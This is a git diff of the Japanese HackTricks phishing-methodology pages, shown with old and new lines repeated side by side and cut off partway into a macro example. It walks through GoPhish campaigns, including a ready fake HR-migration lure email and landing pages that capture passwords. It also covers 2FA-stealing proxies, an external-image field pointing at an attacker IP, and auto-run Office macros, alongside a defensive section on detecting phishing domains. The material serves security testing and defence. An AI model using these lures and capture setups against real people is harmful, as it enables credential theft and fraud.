るいは、**コントロールしているGmailアドレスにメッセージを送信**し、Gmailの受信トレイで受信した**メールのヘッダー**を表示します。`Authentication-Results`ヘッダーフィールドに`dkim=pass`が存在する必要があります。
なたのコントロール下のGmailに**メッセージを送信**し、Gmailの受信トレイで**メールのヘッダー**を確認します。`Authentication-Results`ヘッダーフィールドに`dkim=pass`が存在しているはずです。
```
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
```
### スパムハウスブラックリストからの削除
### Spamhouseブラックリストからの削除
www.mail-tester.comのページは、あなたのドメインがスパムハウスによってブロックされているかどうかを示すことができます。あなたはあなたのドメイン/IPを次の場所で削除することができます[https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
ページ[www.mail-tester.com](www.mail-tester.com)は、あなたのドメインがスパムハウスによってブロックされているかどうかを示すことができます。あなたはあなたのドメイン/IPを次の場所で削除することができます[https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
### マイクロソフトブラックリストからの削除
### Microsoftブラックリストからの削除
あなたは、[https://sender.office.com/](https://sender.office.com)であなたのドメイン/IPを削除することができます。
@ -312,23 +313,23 @@ www.mail-tester.comのページは、あなたのドメインがスパムハウ
### 送信プロファイル
* 送信者プロファイルを識別するための**名前を設定**
* どのアカウントからフィッシングメールを送信するかを決定します。提案_noreply、support、servicedesk、salesforce..._
* ユーザー名とパスワードを空白のままにしても構いませんが、証明書エラーを無視するようにチェックを入れてください
* 送信者プロファイルを識別するための**名前を設定**します
* どのアカウントからフィッシングメールを送信するかを決定します。提案_noreply, support, servicedesk, salesforce..._
* ユーザー名とパスワードを空白のままにしても構いませんが、証明書エラーを無視することを確認してください
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (17).png>)
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (17).png>)
{% hint style="info" %}
すべてが正常に動作しているをテストするために、**「テストメールを送信」**機能を使用することをお勧めします。\
すべてが正常に動作していることをテストするために、**「テストメールを送信」**機能を使用することをお勧めします。\
テストを行う際にブラックリストに登録されないように、**テストメールを10分メールアドレスに送信することをお勧めします**。
{% endhint %}
### メールテンプレート
* テンプレートを識別するための**名前を設定**
* 次に、**件名**を記入します(奇妙なものではなく、通常のメールで読みたいと思えるもの)
* **トラッキング画像を追加**するようにチェックを入れていることを確認してください
* **メールテンプレート**を記します(次の例のように変数を使用することができます):
* テンプレートを識別するための**名前を設定**します
* 次に、**件名**を記述します(奇妙なものではなく、通常のメールで読むことができるもの)
* **トラッキング画像を追加**することを確認してください
* **メールテンプレート**を記します(次の例のように変数を使用することができます):
```markup
<html>
<head>
@ -336,10 +337,8 @@ www.mail-tester.comのページは、あなたのドメインがスパムハウ
</head>
<body>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">As you may be aware, due to the large number of employees working from home, the "PLATFORM NAME" platform is being migrated to a new domain with an improved and more secure version. To finalize account migration, please use the following link to log into the new HR portal and move your account to the new site: <a href="{{.URL}}"> "PLATFORM NAME" login portal </a><br />
<br />
Please Note: We require all users to move their accounts by 04/01/2021. Failure to confirm account migration may prevent you from logging into the application after the migration process is complete.<br />
Note: We require all user to login an a very suspicios page before the end of the week, thanks!<br />
<br />
Regards,</span></p>
@ -349,11 +348,11 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
</body>
</html>
```
**電子メールの信頼性を高めるために**、クライアントからの電子メールにいくつかの署名を使用することが推奨されています。提案:
**電子メールの信頼性を高めるために**、クライアントからの電子メールに署名を使用することをお勧めします。提案:
- **存在しないアドレス**に電子メールを送信し、応答に署名があるかどうかを確認します。
- info@ex.com や press@ex.com、public@ex.com などの**公開された電子メール**を検索し、電子メールを送信して応答を待ちます。
- **いくつかの有効な発見された**電子メールに連絡を取り、応答を待ちます。
* **存在しないアドレス**に電子メールを送信し、返信に署名があるかどうかを確認します。
* info@ex.com や press@ex.com、public@ex.com などの**公開メール**を検索して、電子メールを送信して返信を待ちます。
* **いくつかの有効な発見された**電子メールに連絡し、返信を待ちます
![](<../../.gitbook/assets/image (393).png>)
@ -363,42 +362,42 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
### ランディングページ
- **名前を記入**
- ウェブページの HTML コードを**記入**します。ウェブページを**インポート**することもできます。
- **送信されたデータをキャプチャ**し、**パスワードをキャプチャ**
- **リダイレクト**を設定
* **名前を記入**
* ウェブページの HTML コードを**記入**します。ウェブページを**インポート**することもできます。
* **送信されたデータをキャプチャ**および**パスワードをキャプチャ**するように設定します
* **リダイレクト**を設定します
![](<../../.gitbook/assets/image (394).png>)
{% hint style="info" %}
通常、ページの HTML コードを変更してローカルでテストを行い(たとえば Apache サーバーを使用して)、**結果が気に入るまで**調整します。その後、その HTML コードをボックスに記入します。\
通常、ページの HTML コードを変更してローカルでテストを行い(たとえば Apache サーバーを使用して)、**結果が気に入るまで**行います。その後、その HTML コードをボックスに記入します。\
HTML に**静的リソースを使用する必要がある場合**(たとえば、いくつかの CSS および JS ページ)、それらを _**/opt/gophish/static/endpoint**_ に保存し、_**/static/\<filename>**_ からアクセスできます。
{% endhint %}
{% hint style="info" %}
リダイレクトでは、ユーザーを被害者の正規のメインウェブページに**リダイレクト**するか、例えば _/static/migration.html_ にリダイレクトして、**5秒間スピニングホイール**[**https://loading.io/**](https://loading.io)**)を表示し、その後処理が成功したことを示します。
リダイレクトでは、ユーザーを被害者の正規のメインウェブページに**リダイレクトする**か、例えば _/static/migration.html_ にリダイレクトして、**5秒間スピニングホイール**[**https://loading.io/**](https://loading.io)**)を表示し、その後処理が成功したことを示します。
{% endhint %}
### ユーザー&グループ
- 名前を設定
- データを**インポート**します(例のテンプレートを使用する場合、各ユーザーの名、姓、電子メールアドレスが必要です)
* 名前を設定します
* データを**インポート**します(例のテンプレートを使用する場合、各ユーザーの名、姓、電子メールアドレスが必要です)
![](<../../.gitbook/assets/image (395).png>)
### キャンペーン
最後に、キャンペーンを作成し、名前、電子メールテンプレート、ランディングページ、URL、送信プロファイル、グループを選択します。URL は被害者に送信されるリンクになります
最後に、キャンペーンを作成し、名前、電子メールテンプレート、ランディングページ、URL、送信プロファイル、およびグループを選択します。URL は被害者に送信されるリンクになります
**送信プロファイルを使用して、最終的なフィッシングメールの外観を確認するためにテストメールを送信できます**
**送信プロファイルを使用して、最終的なフィッシングメールの見た目を確認するためにテストメールを送信できます**
![](<../../.gitbook/assets/image (396).png>)
{% hint style="info" %}
テストメールは、テストを行ってブラックリストに登録されるのを避けるために、**10分間メールアドレスに送信することをお勧めします**。
テストメールは、テストを行ってブラックリストに登録されないようにするために、**10分メールアドレスに送信することをお勧めします**。
{% endhint %}
すべてが準備できたら、キャンペーンを開始します!
準備が整ったら、キャンペーンを開始します!
## ウェブサイトのクローン
@ -410,8 +409,8 @@ HTML に**静的リソースを使用する必要がある場合**(たとえ
## バックドア付きドキュメント&ファイル
一部のフィッシングアセスメント(主に Red Team 向け)では、**バックドアを含むファイルを送信**したい場合があります(たとえばC2 または認証をトリガーするもの)。\
いくつかの例については、次のページを参照してください:
一部のフィッシングアセスメント(主に Red Team 向け)では、**バックドアを含むファイルを送信**したい場合があります(たとえば C2 または認証をトリガーするもの)。\
いくつかの例については、次のページをご覧ください:
{% content-ref url="phishing-documents.md" %}
[phishing-documents.md](phishing-documents.md)
@ -423,21 +422,21 @@ HTML に**静的リソースを使用する必要がある場合**(たとえ
前述の攻撃はかなり巧妙で、実際のウェブサイトを偽装し、ユーザーが設定した情報を収集しています。残念ながら、ユーザーが正しいパスワードを入力しなかった場合や、偽装したアプリケーションが2要素認証2FAで構成されている場合、**この情報ではだまされたユーザーをなりすますことはできません**。
のような場合、[**evilginx2**](https://github.com/kgretzky/evilginx2)**、**[**CredSniper**](https://github.com/ustayready/CredSniper)、**[**muraena**](https://github.com/muraenateam/muraena) などのツールが役立ちます。このツールを使用すると、MitM のような攻撃を生成できます。基本的に、攻撃は次のように機能します:
れは、[**evilginx2**](https://github.com/kgretzky/evilginx2)**、**[**CredSniper**](https://github.com/ustayready/CredSniper)、**[**muraena**](https://github.com/muraenateam/muraena)などのツールが役立ちます。このツールを使用すると、MitM のような攻撃を生成できます。基本的に、攻撃は次のように機能します:
1. 実際のウェブページの**ログインフォームをなりすます**。
2. ユーザーは**自分の資格情報**を偽のページに送信し、ツールはそれらを実際のウェブページに送信して、**資格情報が有効かどうかを確認**します。
2. ユーザーは**自分の**資格情報を偽のページに送信し、ツールはそれらを実際のウェブページに送信して、**資格情報が機能するかどうかを確認**します。
3. アカウントが**2FA**で構成されている場合、MitM ページはそれを要求し、**ユーザーが入力**すると、ツールはそれを実際のウェブページに送信します。
4. ユーザーが認証されると、あなた(攻撃者)は、ツールが MitM を実行している間に、**資格情報、2FA、クッキー、およびすべてのインタラクションの情報**をキャプチャします。
4. ユーザーが認証されると、あなた(攻撃者)は、ツールが MitM を実行する間に**資格情報、2FA、クッキー、およびすべての情報**をキャプチャします。
### VNC 経由
被害者を**悪意のあるページ**に送る代わりに、元のページと同じ外観の**VNC セッションに接続されたブラウザ**に送るとどうなりますか?彼が何をしているかを見ることができ、パスワード、使用された MFA、クッキーなどを盗むことができます。\
これは [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC) で行うことができます
被害者を**悪意のあるページ**に送る代わりに、実際のウェブページに接続されたブラウザを持つ**VNC セッションに被害者を送信**するとどうなりますか?彼が何をしているかを見ることができ、パスワード、使用された MFA、クッキーを盗むことができます...\
これは [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC) で行うことができます
## 検出の検出
バレたかどうかを知るための最良の方法の1つは、**ドメインをブラックリスト内で検索**することです。リストされている場合、いかなる方法であれ、あなたのドメインが疑わしいとして検出されました。\
バレたかどうかを知るための最良の方法の1つは、**ドメインをブラックリスト内で検索**することです。リストされている場合、どこかであなたのドメインが疑わしいとして検出されました。\
どのブラックリストにも登録されているかどうかを確認する簡単な方法は、[https://malwareworld.com/](https://malwareworld.com) を使用することです。
ただし、被害者が**野生の中で疑わしいフィッシング活動を積極的に探しているかどうか**を知るための他の方法があります。詳細は次のページで説明されています:
@ -446,28 +445,15 @@ HTML に**静的リソースを使用する必要がある場合**(たとえ
[detecting-phising.md](detecting-phising.md)
{% endcontent-ref %}
被害を受けたかどうかを知るために、被害者のドメイン名に非常に似た名前のドメインを**購入**したり、被害者のドメインの**キーワードを含む**あなたが管理するドメインの**サブドメイン**のために**証明書を生成**したりすることができます。被害者がそれらと**DNS または HTTP のインタラクション**を行うと、**疑わしいドメインを積極的に探している**ことがわかります。その場合は、非常に慎重である必要があります。
被害を受けたかどうかを知るために、被害者のドメイン非常に似た名前のドメインを**購入**したり、被害者のドメインの**キーワードを含む**あなたが管理するドメインの**サブドメイン**のために**証明書を生成**したりすることができます。被害者がそれらと**DNS または HTTP のやり取り**を行うと、**疑わしいドメインを積極的に探している**ことがわかります。その場合は、非常に慎重に行動する必要があります。
### フィッシングの評価
[**Phishious** ](https://github.com/Rices/Phishious)を使用して、あなたの電子メールがスパムフォルダに入るか、ブロックされるか、成功するかを評価してください
[**Phishious** ](https://github.com/Rices/Phishious)を使用して、電子メールがスパムフォルダに入るか、ブロックされるか、成功するかを評価します
## 参考文献
- [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
- [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
- [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expertで**ゼロからヒーローまでのAWSハッキング**を学びましょう!</strong></summary>
HackTricks をサポートする他の方法:
- **HackTricks で企業を宣伝**したり、**HackTricks を PDF でダウンロード**したりする場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
- [**公式 PEASS & HackTricks スワッグ**](https://peass.creator-spring.com)を手に入れる
- 独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションである [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見
- 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
- **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) の GitHub リポジトリに PR を提出して、あなたのハッキングトリックを共有する
</details>
* [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
* [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
* [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
* [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)

61
generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
View file

@ -6,75 +6,74 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウグ**](https://peass.creator-spring.com)を入手
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で私たちを**フォロー**する:[**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください
</details>
## はじめに
フィッシング試行を検出するには、**現在使用されているフィッシング技術を理解することが重要**です。この投稿の親ページには、の情報が記載されていますので、今日使用されている技術がわからない場合は、親ページに移動して少なくともそのセクションを読むことをお勧めします。
フィッシング試行を検出するには、**現在使用されているフィッシング技術を理解することが重要**です。この投稿の親ページには、の情報が記載されていますので、今日使用されている技術がわからない場合は、親ページに移動して少なくともそのセクションを読むことをお勧めします。
この投稿は、**攻撃者がいかにして被害者のドメイン名を模倣したり使用するか**を基にしています。たとえば、あなたのドメインが`example.com`と呼ばれ、何らかの理由で`youwonthelottery.com`のように完全に異なるドメイン名を使用してフィッシングされた場合、これらの技術はそれを発見しません。
この投稿は、**攻撃者がなんらかの方法で被害者のドメイン名を模倣または使用しようとする**という考えに基づいています。たとえば、あなたのドメインが`example.com`と呼ばれ、`youwonthelottery.com`のような完全に異なるドメイン名を使用してフィッシングされた場合、これらの技術はそれを発見しません。
## ドメイン名の変
## ドメイン名の変
**フィッシング**試行を**発見**するのは**簡単**です。メール内で**類似のドメイン**名を使用する**フィッシング**試行を**特定**するだけです。\
攻撃者が使用する可能性のある最もありそうなフィッシング名のリストを**生成**し、それが**登録**されているかどうかを**確認**するか、それを使用している**IP**があるかどうかを**確認**します。
メール内で**類似したドメイン名**を使用する**フィッシング**試行を**発見**するのは**簡単**です。\
攻撃者が使用する可能性のある**最もありそうなフィッシング名のリストを生成**し、それが**登録**されているかどうかを**チェック**するだけで十分です。
### 疑わしいドメインの検出
この目的のために、次のツールのいずれかを使用できます。これらのツールは、ドメインにIPが割り当てられているかどうかを自動的に確認するためにDNSリクエストも実行します
この目的のために、次のツールのいずれかを使用できます。これらのツールは、ドメインにIPが割り当てられているかどうかを自動的にチェックするため、DNSリクエストも実行します
- [**dnstwist**](https://github.com/elceef/dnstwist)
- [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
### ビットフリップ
コンピューティングの世界では、すべてがビット0と1でメモリに格納されています。\
これはドメインにも当てはまります。たとえば、_windows.com_は、コンピューティングデバイスの揮発性メモリ内で_01110111..._になります。\
ただし、太陽フレア、宇宙線、またはハードウェアエラーによって1つのビットが自動的に反転した場合はどうなるでしょうかつまり、0の1になり、その逆もまた然りです。\
この概念をDNSリクエストに適用すると、DNSサーバーに到着する**要求されたドメインが最初に要求されたドメインと同じでない**可能性があります。
**この技術の短い説明は親ページにあります。または、オリジナルの研究を[https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)で読むことができます**
たとえば、ドメインmicrosoft.comの1ビットの変更は、_windnws.com._に変換される可能性があります。\
**攻撃者は、被害者に関連するビットフリップドメインをできるだけ多く登録して、合法的なユーザーを自分たちのインフラストラクチャにリダイレクトする**可能性があります。
たとえば、ドメインmicrosoft.comの1ビットの変更は、_windnws.com._に変換できます。\
**攻撃者は、被害者に関連するビットフリップドメインを可能な限り登録して、合法的なユーザーを自分たちのインフラストラクチャにリダイレクトする可能性があります**。
詳細については、[https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)を参照してください。
**すべての可能なビットフリップドメイン名も監視する必要があります。**
**すべての可能なビットフリップドメイン名も監視されるべきです。**
### 基本的なチェック
潜在的な疑わしいドメイン名のリストを取得したら、それらを主にHTTPおよびHTTPSのポート**チェック**して、それが被害者のドメインのいずれかに似たログインフォームを使用しているかどうかを**確認**ます。\
潜在的な疑わしいドメイン名のリストができたら、それらを主にHTTPおよびHTTPSのポート**チェック**して、被害者のドメインのいずれかに似たログインフォームを使用しているかどうかを**確認**する必要があります。\
ポート3333もチェックして、`gophish`のインスタンスが実行されているかどうかを確認できます。\
また、発見された疑わしいドメインの**年齢を知る**ことも興味深いです。若ければ若いほど、リスクが高くなります。\
HTTPおよび/またはHTTPSの疑わしいWebページの**スクリーンショット**を取得して、疑わしいかどうかを確認し、その場合は**アクセスして詳しく調べる**ことできます。
また、発見された疑わしいドメインの**年齢を知ること**も興味深いです。若ければリスクが高まります。\
HTTPおよび/またはHTTPSの疑わしいWebページの**スクリーンショット**を取得して、疑わしいかどうかを確認し、その場合は**アクセスして詳しく調べる**ことできます。
### 高度なチェック
さらに進む場合は、定期的に(毎日?数秒/数分しかかかりません)**これらの疑わしいドメインを監視し、さらに検索**することをお勧めします。関連するIPの**オープンポートをチェック**し、`gophish`などのツールのインスタンスを**検索**しますはい、攻撃者も間違えますそして、疑わしいドメインとサブドメインのHTTPおよびHTTPSのWebページを**監視**して、被害者のWebページからログインフォームをコピーしているかどうかを確認します。\
これを**自動化**するためには、被害者のドメインのログインフォームのリストを持っておくことをお勧めし、疑わしいWebページをスパイダーし、`ssdeep`のようなものを使用して、疑わしいドメイン内で見つかった各ログインフォームを被害者のドメインの各ログインフォームと比較します。\
疑わしいドメインのログインフォームを特定した場合は、**ダミーの資格情報を送信**して、**被害者のドメインにリダイレクトされるかどうかを確認**できます。
さらに進む場合は、定期的に(毎日?数秒/数分しかかかりません)**これらの疑わしいドメインを監視し、さらに検索**することをお勧めします。関連するIPの**オープンポートをチェック**し、`gophish`や類似のツールのインスタンスを**検索**しますはい、攻撃者も間違えますそして、疑わしいドメインとサブドメインのHTTPおよびHTTPSのWebページを**監視**して、被害者のWebページからログインフォームをコピーしているかどうかを確認します。\
これを**自動化**するためには、被害者のドメインのログインフォームのリストを持っておくことをお勧めし、疑わしいWebページをスパイダリングして、各疑わしいドメイン内で見つかったログインフォームを`ssdeep`のようなものを使用して被害者のドメインの各ログインフォームと比較します。\
疑わしいドメインのログインフォームを特定した場合は、**ダミーの資格情報を送信**して、**被害者のドメインにリダイレクトされるかどうか**を確認できます。
## キーワードを使用したドメイン名
親ページでは、被害者のドメイン名を大きなドメイン内に配置するというドメイン名の変形技術も言及されていますたとえば、paypal.comのためのpaypal-financial.com
親ページでは、被害者のドメイン名を**より大きなドメイン**たとえばpaypal.comのpaypal-financial.comに入れるというドメイン名の変種技術についても言及されています
### 証明書透明性
以前の「ブルートフォース」アプローチを取ることはできませんが、証明書透明性のおかげで、実際には**キーワードを使用したドメインを発見**することができます。CAによって証明書が発行されるたびに、詳細が公開されます。これは、証明書透明性を読んだり、監視したりすることで、**名前にキーワードを使用しているドメインを見つけることができる**ことを意味します。たとえば、攻撃者が[https://paypal-financial.com](https://paypal-financial.com)の証明書を生成した場合、証明書を見ることで「paypal」というキーワードを見つけ、疑わしいメールが使用されていることがわかります。
以前の「ブルートフォース」アプローチを取ることはできませんが、証明書透明性のおかげで、**キーワードを使用したフィッシング試行を発見**することが実際に**可能**です。CAによって証明書が発行されるたびに、詳細が公開されます。これは、証明書透明性を読んだり、監視したりすることで、**名前にキーワードを使用しているドメインを見つけることができる**ことを意味します。たとえば、攻撃者が[https://paypal-financial.com](https://paypal-financial.com)の証明書を生成した場合、証明書を見ることで「paypal」というキーワードを見つけ、疑わしいメールが使用されていることがわかります。
投稿[https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)では、特定のキーワードに影響を与える証明書を検索し、日付「新しい」証明書のみとCA発行者「Let's Encrypt」でフィルタリングするためにCensysを使用できると述べています
![](<../../.gitbook/assets/image (390).png>)
![https://0xpatrik.com/content/images/2018/07/cert_listing.png](<../../.gitbook/assets/image (390).png>)
ただし、無料のWeb [**crt.sh**](https://crt.sh)を使用して「同じ」ことができます。**キーワードを検索**し、必要に応じて結果を**日付とCAでフィルタリング**できます。
![](<../../.gitbook/assets/image (391).png>)
この最後のオプションを使用すると、実際のドメインのIDが疑わしいドメインのIDと一致するかどうかを確認できます(疑わしいドメインが誤検知される可能性があることに注意してください)。
この最後のオプションを使用すると、実際のドメインのいずれかのアイデンティティが疑わしいドメインのいずれかと一致するかどうかを確認するために、一致するアイデンティティフィールドを使用できます(疑わしいドメインが誤検知される可能性があることに注意してください)。
**別の選択肢**は、特定のTLDの**新しく登録されたドメインのリスト**を収集し([Whoxy](https://www.whoxy.com/newly-registered-domains/)がそのようなサービスを提供)、これらのドメインで**キーワードをチェック**することです。ただし、長いドメインは通常、1つ以上のサブドメインを使用するため、キーワードはFLD内に表示されず、フィッシングサブドメインを見つけることができません。
**別の選択肢**は、[**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067)という素晴らしいプロジェクトです。CertStreamは、新しく生成された証明書のリアルタイムストリームを提供し、指定されたキーワードをほぼリアルタイムで検出するために使用できます。実際、[**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher)というプロジェクトがそれを行っています。
### **新しいドメイン**
**最後の選択肢**は、いくつかのTLDTop Level Domainの**新しく登録されたドメインのリスト**を収集し、これらのドメインで**キーワードをチェック**することです([Whoxy](https://www.whoxy.com/newly-registered-domains/)がそのようなサービスを提供しています。ただし、長いドメインは通常1つ以上のサブドメインを使用するため、キーワードはFLD内に表示されず、フィッシングサブドメインを見つけることができません。

64
generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View file

@ -1,50 +1,48 @@
# フィッシングファイルドキュメント
# フィッシングファイルドキュメント
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したい**ですか、またはHackTricksをPDFでダウンロードしたいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## オフィスドキュメント
Microsoft Wordはファイルを開く前にファイルデータの検証を行います。データの検証は、OfficeOpenXML標準に対してデータ構造の識別として行われます。データ構造の識別中にエラーが発生した場合、分析対象のファイルは開かれません。
Microsoft Wordはファイルを開く前にファイルデータの検証を行います。データ検証は、OfficeOpenXML標準に対するデータ構造の識別の形で行われます。データ構造の識別中にエラーが発生した場合、分析されているファイルは開かれません。
通常、マクロを含むWordファイルは`.docm`拡張子を使用します。ただし、ファイルの拡張子を変更してもマクロの実行機能を保持することができます。\
たとえば、RTFファイルは設計上マクロをサポートしていませんが、RTFに名前を変更したDOCMファイルはMicrosoft Wordで処理され、マクロの実行が可能になります。\
同じ内部構造とメカニズムは、Microsoft Office SuiteのすべてのソフトウェアExcel、PowerPointなどに適用されます。
通常、マクロを含むWordファイルは`.docm`拡張子を使用します。ただし、ファイルの拡張子を変更してもマクロの実行機能を保持することが可能です。\
たとえば、RTFファイルは設計上マクロをサポートしていませんが、RTFに名前が変更されたDOCMファイルはMicrosoft Wordによって処理され、マクロの実行が可能になります。\
同じ内部構造とメカニズムMicrosoft Office SuiteのすべてのソフトウェアExcel、PowerPointなどに適用されます。
次のコマンドを使用して、いくつかのOfficeプログラムで実行される拡張子を確認できます:
次のコマンドを使用して、一部のOfficeプログラムによって実行される拡張子を確認できます:
```bash
assoc | findstr /i "word excel powerp"
```
DOCXファイルは、マクロを含むリモートテンプレートファイル - オプション - アドイン - 管理:テンプレート - 移動)を参照することができ、マクロを「実行」することもできます。
### 外部画像の読み込み
次に進みます:_挿入 --> クイックパーツ --> フィールド_\
_**カテゴリ**: リンクと参照, **フィールド名**: includePicture, **ファイル名またはURL**:_ http://\<ip>/whatever
Go to: _挿入 --> クイックパーツ --> フィールド_\
_**カテゴリ**: リンクと参照、**フィールド名**: includePicture、**ファイル名またはURL**:_ http://\<ip>/whatever
![](<../../.gitbook/assets/image (316).png>)
### マクロバックドア
### マクロバックドア
マクロを使用してドキュメントから任意のコードを実行することができます。
文書から任意のコードを実行するためにマクロを使用することが可能です。
#### 自動ロード関数
#### 自動読み込み関数
一般的な関数ほど、AVに検出される可能性が高くなります。
一般的な関数ほど、AVがそれらを検出する可能性が高くなります。
* AutoOpen()
* Document\_Open()
#### マクロコード例
#### マクロコード
```vba
Sub AutoOpen()
